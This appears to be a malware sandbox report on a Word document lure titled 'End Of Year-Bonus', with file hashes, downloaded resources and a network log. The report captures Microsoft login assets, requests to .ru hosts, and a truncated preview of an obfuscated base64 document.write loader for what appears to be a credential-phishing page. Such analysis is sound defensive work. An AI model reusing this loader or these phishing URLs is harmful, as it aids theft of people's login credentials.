                                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):61
                                                                            Entropy (8bit):3.990210155325004
                                                                            Encrypted:false
                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                            Category:downloaded
                                                                            Size (bytes):20410
                                                                            Entropy (8bit):7.980582012022051
                                                                            Encrypted:false
                                                                            SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                            MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                            SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                            SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                            SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                            Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                            Category:downloaded
                                                                            Size (bytes):2672
                                                                            Entropy (8bit):6.640973516071413
                                                                            Encrypted:false
                                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                            Category:dropped
                                                                            Size (bytes):5525
                                                                            Entropy (8bit):7.961202222662501
                                                                            Encrypted:false
                                                                            SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                            MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                            SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                            SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                            SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                            Malicious:false
                                                                            Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                            Category:downloaded
                                                                            Size (bytes):35170
                                                                            Entropy (8bit):7.993096534744333
                                                                            Encrypted:true
                                                                            SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                            MD5:171A4DD9400708B88724B57D62B24A6A
                                                                            SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                            SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                            SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                            Category:downloaded
                                                                            Size (bytes):16345
                                                                            Entropy (8bit):7.98960525258912
                                                                            Encrypted:false
                                                                            SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                            MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                            SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                            SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                            SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                                            Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                            Category:dropped
                                                                            Size (bytes):673
                                                                            Entropy (8bit):7.6596900876595075
                                                                            Encrypted:false
                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                            Malicious:false
                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                            Category:downloaded
                                                                            Size (bytes):3620
                                                                            Entropy (8bit):6.867828878374734
                                                                            Encrypted:false
                                                                            SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                            Category:dropped
                                                                            Size (bytes):17174
                                                                            Entropy (8bit):2.9129715116732746
                                                                            Encrypted:false
                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                            Malicious:false
                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:downloaded
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            URL:https://vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru/310464925672995352ugqKwpWJAGDHWYJSQVQXHKATTCSIZYDMVIKIRN
                                                                            Preview:1
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (7409), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):19826
                                                                            Entropy (8bit):5.882845673181381
                                                                            Encrypted:false
                                                                            SSDEEP:384:fnuIap5Z4X6EDVvxPkenuIap5Z4X6EDVvx5blrhlrk:0p5Z4XZ5PkVp5Z4XZ55blrhlrk
                                                                            MD5:C2BE201B9289456B666A5969F5B7E2BE
                                                                            SHA1:E7E54502F413DF084AD7B1724E996C5D56DFF5C2
                                                                            SHA-256:D606BB1C75416138BC26A68D49340AF5F3324130F849C48718A619FBAC5BE61B
                                                                            SHA-512:C4C5F2EC76AE21B60943EC77842DFBBEBE33E130A7748E4570711EBEA1203493DEA3F982C647BA5E11F777F4A67E9AF914549B7E4DAA04992723A9B964593218
                                                                            Malicious:false
                                                                            URL:https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/
                                                                            Preview:<script>../* Success is not in what you have, but who you are. */..if(atob("aHR0cHM6Ly9HUy5xdWFudHVtZGh1Yi5ydS9IWDhoaUxQYWRhejFON1dybHRwUGpIZzM0cV8yQzk4aWcv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6IC
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                            Category:dropped
                                                                            Size (bytes):116343
                                                                            Entropy (8bit):7.997640489040715
                                                                            Encrypted:true
                                                                            SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                            MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                            SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                            SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                            SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                            Malicious:false
                                                                            Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                            File type:Microsoft Word 2007+
                                                                            Entropy (8bit):5.6754519036521565
                                                                            TrID:
                                                                            • Word Microsoft Office Open XML Format document (27504/1) 77.45%
                                                                            • ZIP compressed archive (8000/1) 22.53%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.02%
                                                                            File name:Gioia Faggioli-End Of Year-Bonus.docx
                                                                            File size:38'076 bytes
                                                                            MD5:5b1859de22f4394e324e103af9b2c79a
                                                                            SHA1:e8d51177a7a5f04537af8ffc830ab44e7bfe0a3e
                                                                            SHA256:33a01db697b9f3e1135e0f5fe67a56305fa6881e51bae55edede5c72d3cd0106
                                                                            SHA512:2758bad8f612d30880471c6fa055a3033592ee13caea826ac4f031c200c04ce21425a6c99ed0ab736e46cf495a976469fce43343098465452c6a42b5ba166f2a
                                                                            SSDEEP:768:43K13KXrNeOFmKycUIAUnfF5Xgd+F+X59DYxAKljlx7t67mDGj2B+gYl8dO3Bgrp:+KRKXrNeOYKycUIh+X59Dsdljlx7t67m
                                                                            TLSH:79032AA2F6F6481DD34046F062A12502FFACB0DB03D56646B25DDBF96F8ACA539873C4
                                                                            File Content Preview:PK.........j.Y................word/PK.........j.Y................word/media/PK.........j.Y.TX.!...!...*...word/media/image-lEw74ekhxdiDEZV8l3dmp.png.PNG........IHDR...l.................pHYs...........~.....IDATh..XMN.P..\.E......' ,.-...$'.H.....s....1.vQ
                                                                            Icon Hash:35e5c48caa8a8599
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 19, 2024 15:36:06.525825977 CET49677443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:06.525945902 CET49676443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:06.526026964 CET49678443192.168.2.17204.79.197.200
                                                                            Dec 19, 2024 15:36:11.530844927 CET49704443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:11.530889034 CET44349704104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:11.530992985 CET49704443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:11.531369925 CET49704443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:11.531385899 CET44349704104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:11.531852007 CET49705443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:11.531900883 CET44349705104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:11.531970978 CET49705443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:11.532248974 CET49705443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:11.532263041 CET44349705104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.749044895 CET44349705104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.749341965 CET49705443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.749375105 CET44349705104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.749813080 CET44349704104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.750075102 CET49704443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.750099897 CET44349704104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.750488043 CET44349705104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.750569105 CET49705443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.751190901 CET44349704104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.751271009 CET49704443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.752729893 CET49705443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.752760887 CET49705443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.752808094 CET44349705104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.752841949 CET49705443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.752909899 CET49705443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.753226042 CET49708443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.753272057 CET44349708104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.753355980 CET49708443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.753396988 CET49704443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.753408909 CET49704443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.753462076 CET49704443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.753509045 CET44349704104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.753577948 CET49704443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.753678083 CET49709443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.753735065 CET44349709104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.753804922 CET49709443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.753892899 CET49708443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.753905058 CET44349708104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:12.754033089 CET49709443192.168.2.17104.21.112.1
                                                                            Dec 19, 2024 15:36:12.754055023 CET44349709104.21.112.1192.168.2.17
                                                                            Dec 19, 2024 15:36:14.072338104 CET44349709104.21.112.1192.168.2.17
